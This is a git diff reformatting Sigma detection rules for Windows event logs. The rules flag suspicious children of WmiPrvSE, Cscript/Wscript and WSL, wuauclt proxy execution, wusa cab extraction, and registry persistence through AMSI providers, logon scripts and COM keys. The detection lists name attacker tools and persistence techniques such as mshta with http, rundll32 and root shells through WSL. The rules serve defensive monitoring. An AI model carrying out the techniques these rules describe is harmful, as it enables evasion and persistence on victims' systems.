47ea58528..0ac0d93bf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml @@ -1,12 +1,12 @@ title: Suspicious WmiPrvSE Child Process id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 related: - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: similar - - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d - type: similar - - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 - type: obsoletes + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: similar + - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d + type: similar + - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 + type: obsoletes status: test description: Detects suspicious and uncommon child processes of WmiPrvSE references: @@ -33,7 +33,8 @@ detection: selection_parent: ParentProcessName|endswith: \wbem\WmiPrvSE.exe selection_children_1: - NewProcessName|endswith: + # TODO: Add more LOLBINs or suspicious processes that make sens in your environment + NewProcessName|endswith: - \certutil.exe - \cscript.exe - \mshta.exe @@ -43,7 +44,8 @@ detection: - \verclsid.exe - \wscript.exe selection_children_2: - CommandLine|contains: + # This is in a separate selection due to the nature of FP generated with CMD + CommandLine|contains: - cscript - mshta - powershell @@ -51,16 +53,15 @@ detection: - regsvr32 - rundll32 - wscript - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_main_werfault: - NewProcessName|endswith: \WerFault.exe + NewProcessName|endswith: \WerFault.exe filter_main_wmiprvse: - NewProcessName|endswith: \WmiPrvSE.exe + NewProcessName|endswith: \WmiPrvSE.exe filter_main_msiexec: - CommandLine|contains: '/i ' - NewProcessName|endswith: \msiexec.exe - condition: process_creation and (selection_parent and 1 of selection_children_* - and not 1 of filter_main_*) + CommandLine|contains: '/i ' + NewProcessName|endswith: \msiexec.exe + condition: process_creation and (selection_parent and 1 of selection_children_* and not 1 of filter_main_*) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml index 1e34eaafa..248a9bd17 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml @@ -1,8 +1,7 @@ title: UEFI Persistence Via Wpbbin - ProcessCreation id: 4abc0ec4-db5a-412f-9632-26659cddf145 status: test -description: Detects execution of the binary "wpbbin" which is used as part of the - UEFI based persistence method described in the reference section +description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html @@ -20,10 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName: C:\Windows\System32\wpbbin.exe + NewProcessName: C:\Windows\System32\wpbbin.exe condition: process_creation and selection falsepositives: - - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks - @0gtweet for the tip) + - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml index 96ad66f86..3a246cc65 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml @@ -1,11 +1,10 @@ title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript id: 1e33157c-53b1-41ad-bbcc-780b80b58288 related: - - id: 23250293-eed5-4c39-b57a-841c8933a57d - type: obsoletes + - id: 23250293-eed5-4c39-b57a-841c8933a57d + type: obsoletes status: test -description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by - Wscript/Cscript +description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript author: Michael Haag date: 2019/01/16 modified: 2023/05/15 @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - NewProcessName|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - NewProcessName|endswith: + - \wscript.exe + - \cscript.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .js - .jse - .vba @@ -37,7 +36,6 @@ detection: - .wsf condition: process_creation and (all of selection_*) falsepositives: - - Some additional tuning is required. It is recommended to add the user profile - path in CommandLine if it is getting too noisy. + - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml index c7dd8f6db..a8408d712 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml @@ -1,14 +1,9 @@ title: Cscript/Wscript Potentially Suspicious Child Process id: b6676963-0353-4f88-90f5-36c20d443c6a status: experimental -description: 'Detects potentially suspicious child processes of Wscript/Cscript. These - include processes such as rundll32 with uncommon exports or PowerShell spawning - rundll32 or regsvr32. - - Malware such as Pikabot and Qakbot were seen using similar techniques as well - as many others. - - ' +description: | + Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. + Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. references: - Internal Research - https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt @@ -30,32 +25,30 @@ detection: - \wscript.exe - \cscript.exe selection_cli_script_main: - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe + # Note: Add other combinations that are suspicious selection_cli_script_option_mshta: - CommandLine|contains|all: + CommandLine|contains|all: - mshta - http selection_cli_script_option_other: - CommandLine|contains: + CommandLine|contains: - rundll32 - regsvr32 - msiexec selection_cli_standalone: - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe filter_main_rundll32_known_exports: - CommandLine|contains: + CommandLine|contains: - UpdatePerUserSystemParameters - PrintUIEntry - ClearMyTracksByProcess - NewProcessName|endswith: \rundll32.exe - condition: process_creation and (selection_parent and ( selection_cli_standalone - or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and - not 1 of filter_main_*) + NewProcessName|endswith: \rundll32.exe + condition: process_creation and (selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*) falsepositives: - - Some false positives might occur with admin or third party software scripts. - Investigate and apply additional filters accordingly. + - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml index b9d734f41..08b9f0400 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml @@ -1,8 +1,7 @@ title: Cscript/Wscript Uncommon Script Extension Execution id: 99b7460d-c9f1-40d7-a316-1f36f61d52ee status: experimental -description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) - extension +description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension author: Nasreddine Bencherchali (Nextron Systems) date: 2023/05/15 modified: 2023/06/19 @@ -18,14 +17,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - NewProcessName|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - NewProcessName|endswith: + - \wscript.exe + - \cscript.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: add additional potential suspicious extension + # We could specify the "//E:" flag to avoid typos by admin. But since that's prone to blind spots via the creation of assoc it's better not to include it - .csv - .dat - .doc diff --git a/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml b/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml index 1380c2be9..dd779d541 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml @@ -1,12 +1,10 @@ title: WSL Child Process Anomaly id: 2267fe65-0681-42ad-9a6d-46553d3f3480 related: - - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b - type: derived + - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule + type: derived status: experimental -description: Detects uncommon or suspicious child processes spawning from a WSL process. - This could indicate an attempt to evade parent/child relationship detections or - persistence attempts via cron using WSL +description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 @@ -30,7 +28,8 @@ detection: - \wsl.exe - \wslhost.exe selection_children_images: - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious/uncommon "lolbin" processes - \calc.exe - \cmd.exe - \cscript.exe @@ -41,7 +40,7 @@ detection: - \rundll32.exe - \wscript.exe selection_children_paths: - NewProcessName|contains: + NewProcessName|contains: - \AppData\Local\Temp\ - C:\Users\Public\ - C:\Windows\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml index 5faa39de4..1ce2bc598 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml @@ -1,11 +1,10 @@ title: Arbitrary Command Execution Using WSL id: dec44ca7-61ad-493c-bfd7-8819c5faa09b related: - - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 - type: similar + - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 # Generic susp child processes rules + type: similar status: test -description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as - a LOLBIN to execute arbitrary Linux or Windows commands +description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 @@ -25,28 +24,31 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wsl.exe - - OriginalFileName: wsl.exe + - NewProcessName|endswith: \wsl.exe + - OriginalFileName: wsl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --exec' - ' --system' - ' --shell-type ' - - ' /mnt/c' + - ' /mnt/c' # Path to mounted "C:\" partition (Indication of running Windows binaries via WSL) - ' --user root' - ' -u root' - --debug-shell filter_main_kill: - CommandLine|contains|all: + # This filter is to handle a FP that occurs when a process is spawned from WSL and then closed by the user + # Example would be to open VsCode through it's server extension from WSL + # GrandparentCommandLine: "C:\Users\XXX\AppData\Local\Programs\Microsoft VS Code\Code.exe" --ms-enable-electron-run-as-node c:\Users\XXX\.vscode\extensions\ms-vscode-remote.remote-wsl-0.72.0\dist\wslDaemon.js + # ParentCommandLine: C:\WINDOWS\system32\cmd.exe /d /s /c "C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366" + # CommandLine: C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366 + CommandLine|contains|all: - ' -d ' - ' -e kill ' ParentProcessName|endswith: \cmd.exe condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Automation and orchestration scripts may use this method to execute scripts - etc. - - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL - server) + - Automation and orchestration scripts may use this method to execute scripts etc. + - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml b/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml index 2175c829f..76da03823 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml @@ -1,18 +1,16 @@ title: Proxy Execution Via Wuauclt.EXE id: af77cf95-c469-471c-b6a0-946c685c4798 related: - - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 - type: obsoletes - - id: d7825193-b70a-48a4-b992-8b5b3015cc11 - type: obsoletes + - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 + type: obsoletes + - id: d7825193-b70a-48a4-b992-8b5b3015cc11 + type: obsoletes status: test -description: Detects the use of the Windows Update Client binary (wuauclt.exe) for - proxy execution. +description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. references: - https://dtm.uk/wuauclt/ - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth - (Nextron Systems), Sreeman, FPT.EagleEye Team +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team date: 2020/10/12 modified: 2023/11/11 tags: @@ -27,22 +25,24 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - NewProcessName|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - UpdateDeploymentProvider - RunHandlerComServer filter_main_generic: - CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' filter_main_wuaueng: - CommandLine|contains: ' wuaueng.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' wuaueng.dll ' filter_main_uus: - CommandLine|contains: + CommandLine|contains: - :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId - :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId filter_main_winsxs: - CommandLine|contains|all: + CommandLine|contains|all: - :\Windows\WinSxS\ - '\UpdateDeploy.dll /ClassId ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml index 2c177c4c7..5721b4a35 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml @@ -1,10 +1,8 @@ title: Suspicious Windows Update Agent Empty Cmdline id: 52d097e2-063e-4c9c-8fbb-855c8948d135 status: test -description: 'Detects suspicious Windows Update Agent activity in which a wuauclt.exe - process command line doesn''t contain any command line flags - - ' +description: | + Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Wuauclt.exe - - OriginalFileName: Wuauclt.exe + - NewProcessName|endswith: \Wuauclt.exe + - OriginalFileName: Wuauclt.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - Wuauclt - Wuauclt.exe condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml index 427d5ae49..8f7da50e9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml @@ -1,9 +1,7 @@ title: Wusa Extracting Cab Files id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9 status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument which is not longer supported. - This could indicate an attacker using an old technique +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,11 +16,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '/extract:' - NewProcessName|endswith: \wusa.exe + CommandLine|contains: '/extract:' + NewProcessName|endswith: \wusa.exe condition: process_creation and selection falsepositives: - - The "extract" flag still works on older 'wusa.exe' versions, which could be - a legitimate use (monitor the path of the cab being extracted) + - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml index 0587814d1..07a57924f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml @@ -1,8 +1,7 @@ title: Wusa.EXE Extracting Cab Files From Suspicious Paths id: c74c0390-3e20-41fd-a69a-128f0275a5ea status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument from suspicious paths +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://www.echotrail.io/insights/search/wusa.exe/ @@ -19,14 +18,16 @@ detection: EventID: 4688 Channel: Security selection_root: - CommandLine|contains: '/extract:' - NewProcessName|endswith: \wusa.exe + CommandLine|contains: '/extract:' + NewProcessName|endswith: \wusa.exe selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Users\Public\ - :\Windows\Temp\ - \Appdata\Local\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml index f62ade2dc..96ed73a55 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml @@ -1,10 +1,8 @@ title: Wusa.EXE Executed By Parent Process Located In Suspicious Location id: ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99 status: experimental -description: 'Detects execution of the "wusa.exe" (Windows Update Standalone Installer) - utility by a parent process that is located in a suspicious location. - - ' +description: | + Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. references: - https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document author: X__Junior (Nextron Systems) @@ -19,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \wusa.exe + NewProcessName|endswith: \wusa.exe selection_paths_1: ParentProcessName|contains: - :\Perflogs\ @@ -28,18 +26,18 @@ detection: - \Appdata\Local\Temp\ - \Temporary Internet selection_paths_2: - - ParentProcessName|contains|all: - - :\Users\ - - \Favorites\ - - ParentProcessName|contains|all: - - :\Users\ - - \Favourites\ - - ParentProcessName|contains|all: - - :\Users\ - - \Contacts\ - - ParentProcessName|contains|all: - - :\Users\ - - \Pictures\ + - ParentProcessName|contains|all: + - :\Users\ + - \Favorites\ + - ParentProcessName|contains|all: + - :\Users\ + - \Favourites\ + - ParentProcessName|contains|all: + - :\Users\ + - \Contacts\ + - ParentProcessName|contains|all: + - :\Users\ + - \Pictures\ condition: process_creation and (selection_img and 1 of selection_paths_*) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml b/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml index 154092c36..e8f66d225 100644 --- a/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml +++ b/sigma/builtin/registry/registry_add/registry_add_malware_netwire.yml @@ -22,7 +22,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \software\NetWire condition: registry_add and selection falsepositives: diff --git a/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml b/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml index 141fc1074..148a9a35b 100644 --- a/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml +++ b/sigma/builtin/registry/registry_add/registry_add_malware_ursnif.yml @@ -19,7 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \Software\AppDataLow\Software\Microsoft\ filter: ObjectName|contains: diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml index 9b7479be9..06f5ad620 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via New AMSI Providers - Registry id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 status: test -description: Detects when an attacker registers a new AMSI provider in order to achieve - persistence +description: Detects when an attacker registers a new AMSI provider in order to achieve persistence references: - https://persistence-info.github.io/Data/amsi.html - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c @@ -19,7 +18,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: - \SOFTWARE\Microsoft\AMSI\Providers\ - \SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\ @@ -30,7 +29,6 @@ detection: - C:\Program Files (x86)\ condition: registry_add and (selection and not filter) falsepositives: - - Legitimate security products adding their own AMSI providers. Filter these according - to your environment + - Legitimate security products adding their own AMSI providers. Filter these according to your environment level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml index 1d757f759..61e42dc5c 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml @@ -18,12 +18,14 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains|all: - \REGISTRY\USER\ - Classes\CLSID\ - \TreatAs filter_svchost: + # Example of target object by svchost + # TargetObject: HKU\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs ProcessName: C:\WINDOWS\system32\svchost.exe condition: registry_add and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml index cc9f52ef1..aa1f84d9e 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml @@ -1,16 +1,13 @@ title: Potential Persistence Via Disk Cleanup Handler - Registry id: d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a status: test -description: "Detects when an attacker modifies values of the Disk Cleanup Handler\ - \ in the registry to achieve persistence.\nThe disk cleanup manager is part of\ - \ the operating system. It displays the dialog box [\u2026]\nThe user has the\ - \ option of enabling or disabling individual handlers by selecting or clearing\ - \ their check box in the disk cleanup manager's UI.\nAlthough Windows comes with\ - \ a number of disk cleanup handlers, they aren't designed to handle files produced\ - \ by other applications.\nInstead, the disk cleanup manager is designed to be\ - \ flexible and extensible by enabling any developer to implement and register\ - \ their own disk cleanup handler.\nAny developer can extend the available disk\ - \ cleanup services by implementing and registering a disk cleanup handler.\n" +description: | + Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. + The disk cleanup manager is part of the operating system. It displays the dialog box […] + The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. + Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. + Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. + Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ @@ -27,9 +24,10 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\ filter: + # Default Keys ObjectName|endswith: - \Active Setup Temp Folders - \BranchCache diff --git a/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml b/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml index 060698ac6..d70431a44 100644 --- a/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml +++ b/sigma/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Logon Scripts - Registry id: 9ace0707-b560-49b8-b6ca-5148b42f39fb status: test -description: Detects creation of "UserInitMprLogonScript" registry value which can - be used as a persistence method by malicious actors +description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md author: Tom Ueltschi (@c_APT_ure) @@ -20,11 +19,10 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: UserInitMprLogonScript condition: registry_add and selection falsepositives: - - Investigate the contents of the "UserInitMprLogonScript" value to determine - of the added script is legitimate + - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml index 4ec0bfa46..6b7bf6050 100644 --- a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml +++ b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml @@ -1,8 +1,7 @@ title: PUA - Sysinternal Tool Execution - Registry id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 status: test -description: Detects the execution of a Sysinternals Tool via the creation of the - "accepteula" registry key +description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis @@ -19,7 +18,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|endswith: \EulaAccepted condition: registry_add and selection falsepositives: diff --git a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml index f8ab5c87f..eb5eb7916 100644 --- a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml +++ b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml @@ -1,14 +1,12 @@ title: Suspicious Execution Of Renamed Sysinternals Tools - Registry id: f50f3c09-557d-492d-81db-9064a8d4e211 related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: 8023f872-3f1d-4301-a384-801889917ab4 - type: similar + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: 8023f872-3f1d-4301-a384-801889917ab4 + type: similar status: test -description: Detects the creation of the "accepteula" key related to the Sysinternals - tools being created from executables with the wrong name (e.g. a renamed Sysinternals - tool) +description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -25,7 +23,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: - \Active Directory Explorer - \Handle @@ -42,6 +40,7 @@ detection: ObjectName|endswith: \EulaAccepted filter: ProcessName|endswith: + # Please add new values while respecting the alphabetical order - \ADExplorer.exe - \ADExplorer64.exe - \handle.exe diff --git a/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml b/sigma/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml index 72a452280..e385fd600 100644 